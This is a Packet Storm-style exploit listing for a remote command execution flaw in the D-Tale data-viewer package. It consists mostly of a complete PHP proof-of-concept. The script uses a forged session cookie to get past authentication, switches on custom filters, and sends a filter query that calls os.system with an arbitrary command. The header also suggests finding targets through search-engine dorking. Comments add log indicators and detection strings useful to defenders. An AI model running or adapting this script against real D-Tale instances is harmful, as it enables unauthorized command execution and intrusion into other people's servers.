## https://sploitus.com/exploit?id=PACKETSTORM:189774
=============================================================================================================================================
| # Title : D Tale v3.15.1 PHP code execution vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://pypi.org/project/dtale/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
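[+] Code Description: PoC client written in PHP for the D-Tale remote command execution vulnerability. D-Tale itself is a Python package (see the vendor link above); PHP is only the language of this script.
(Related: https://packetstorm.news/files/id/189509/ Linked CVE numbers: CVE-2024-3408, CVE-2025-0655).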
[+] save code as poc.php.
[+] Set Target = line 102
[+] Usage = php poc.php
[+] PayLoad :
<?php
// Proof-of-concept client for the D-Tale custom-filter command execution issue
// (the advisory text above links CVE-2024-3408 and CVE-2025-0655).
//
// Request sequence issued by this class, usable as a review checklist for
// reverse-proxy / application access logs of a D-Tale instance:
//   1. GET  /dtale/popup/upload          - reads the version from the page markup
//   2. POST /dtale/upload                - creates a dataset and returns its data_id
//   3. GET  /dtale/update-settings/<id>  - settings JSON with enable_custom_filters=true
//   4. GET  /dtale/test-filter/<id>      - query parameter containing __import__('os').system(...)
//   5. GET  /dtale/cleanup-datasets      - deletes the dataset created in step 2
//
// NOTE(review): fixed releases and hardening guidance are not stated on this page;
// take them from the vendor advisories for the linked CVEs.
class D_Tale_RCE_Exploit {
// Static session cookie sent with every request. Its first segment is base64url
// JSON that decodes to {"logged_in":true,"username":"whatever"}, i.e. an
// already-"logged in" session. Presumably it is only accepted where the server
// signs sessions with a key known to the PoC author - TODO confirm against the
// CVE-2024-3408 advisory.
private $session = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc';
// Base URL of the D-Tale instance; request paths are appended to it verbatim.
private $target_url;
// Dataset identifier parsed from the upload response in exploit(); unset until then.
private $data_id;
// Command string that exploit() embeds, unescaped, into the filter query.
private $payload;
// Stores the base URL and the command string; performs no validation or I/O.
public function __construct($target_url, $payload) {
$this->target_url = $target_url;
$this->payload = $payload;
}
// Sends a GET request to target_url . $uri with the given raw header lines.
// Returns whatever curl_exec() returns: the response body as a string, or
// false on transport failure (callers in this class do not check for false).
private function send_get_request($uri, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
// Peer certificate verification is switched off, so any TLS certificate is accepted.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
// Sends a POST request to target_url . $uri with $data as the raw body and
// the given raw header lines. Same return contract as send_get_request().
private function send_post_request($uri, $data, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
// Peer certificate verification is switched off, so any TLS certificate is accepted.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
// Version fingerprint only: fetches the upload popup with the static session
// cookie and reads the hidden "version" input from the returned HTML.
// Returns true when that value compares <= 3.15.1, false otherwise (including
// when the field is absent). It does not probe the flaw itself, so the result
// says nothing about whether a given deployment has been patched or hardened.
public function check_vulnerability() {
$headers = ['Cookie: session=' . $this->session];
$response = $this->send_get_request('/dtale/popup/upload', $headers);
if (strpos($response, 'version') !== false) {
preg_match('/<input type="hidden" id="version" value="(.*?)">/', $response, $matches);
if (isset($matches[1]) && version_compare($matches[1], '3.15.1', '<=')) {
return true;
}
}
return false;
}
// Runs the three-request chain: upload a dataset, switch on custom filters for
// it, then submit a filter query that calls os.system with $this->payload.
// Returns nothing; progress is reported with echo only.
public function exploit() {
// Step 1: upload a one-cell placeholder CSV; the upload is only needed to obtain a data_id.
// Multipart boundary with a random numeric suffix.
$mime_boundary = "---------------------------" . rand();
$data = "--$mime_boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"payload.csv\"\r\n";
$data .= "Content-Type: text/csv\r\n\r\n";
$data .= "payload_data\r\n";
$data .= "--$mime_boundary--\r\n";
// The same header array is reused for the GET requests in steps 2 and 3, so
// those GETs also carry a multipart/form-data Content-Type header.
$headers = [
'Content-Type: multipart/form-data; boundary=' . $mime_boundary,
'Cookie: session=' . $this->session
];
$response = $this->send_post_request('/dtale/upload', $data, $headers);
// Pull the dataset id out of the JSON-looking response text by regex.
preg_match('/"data_id":"(.*?)"/', $response, $matches);
if (isset($matches[1])) {
$this->data_id = $matches[1];
echo "Data ID: " . $this->data_id . "\n";
} else {
echo "Failed to get data ID.\n";
return;
}
// Step 2: request enable_custom_filters=true through the update-settings
// endpoint. A remote client being able to flip this setting is the core of the
// issue; in logs, this request with that key in its settings JSON is a strong indicator.
$settings = json_encode(['enable_custom_filters' => true]);
$this->send_get_request("/dtale/update-settings/{$this->data_id}?settings=" . urlencode($settings), $headers);
// Step 3: submit a custom filter whose expression reaches builtins.__import__
// and calls os.system. The payload is concatenated without escaping. A
// test-filter query containing "__import__" is not a legitimate dataframe
// filter and is a high-confidence detection string.
$query = "@pd.core.frame.com.builtins.__import__('os').system('" . $this->payload . "')";
$this->send_get_request("/dtale/test-filter/{$this->data_id}?query=" . urlencode($query) . "&save=true", $headers);
// Printed unconditionally: the responses from steps 2 and 3 are discarded, so
// this line is not evidence that anything ran on the server.
echo "Payload executed successfully.\n";
}
// Asks the server to delete the dataset created by exploit(), if one was
// created. For incident review this means the dataset may no longer exist on
// the instance; HTTP access logs are the more reliable record of the sequence.
public function cleanup() {
if ($this->data_id) {
$headers = ['Cookie: session=' . $this->session];
$this->send_get_request("/dtale/cleanup-datasets?dataIds={$this->data_id}", $headers);
echo "Cleaned up the dataset.\n";
}
}
}
// Usage: driver script. Runs the version fingerprint first and only when it
// reports a version <= 3.15.1 issues the upload, update-settings, test-filter
// and cleanup requests.
// Placeholder host; the instructions above tell the reader to edit this line.
$target_url = 'http://target.site.com';
// `id` prints the account the command runs as. The PoC never reads the command
// output back (the test-filter response is discarded), so it shows up only on
// the server side. The privileges of the account running D-Tale bound the impact.
$payload = 'id'; // Example payload
$exploit = new D_Tale_RCE_Exploit($target_url, $payload);
if ($exploit->check_vulnerability()) {
echo "Vulnerable version detected. Exploiting...\n";
$exploit->exploit();
$exploit->cleanup();
} else {
// Reached whenever the version field is missing or newer than 3.15.1; it is a
// statement about the fingerprint, not a verified security property.
echo "Target is not vulnerable.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================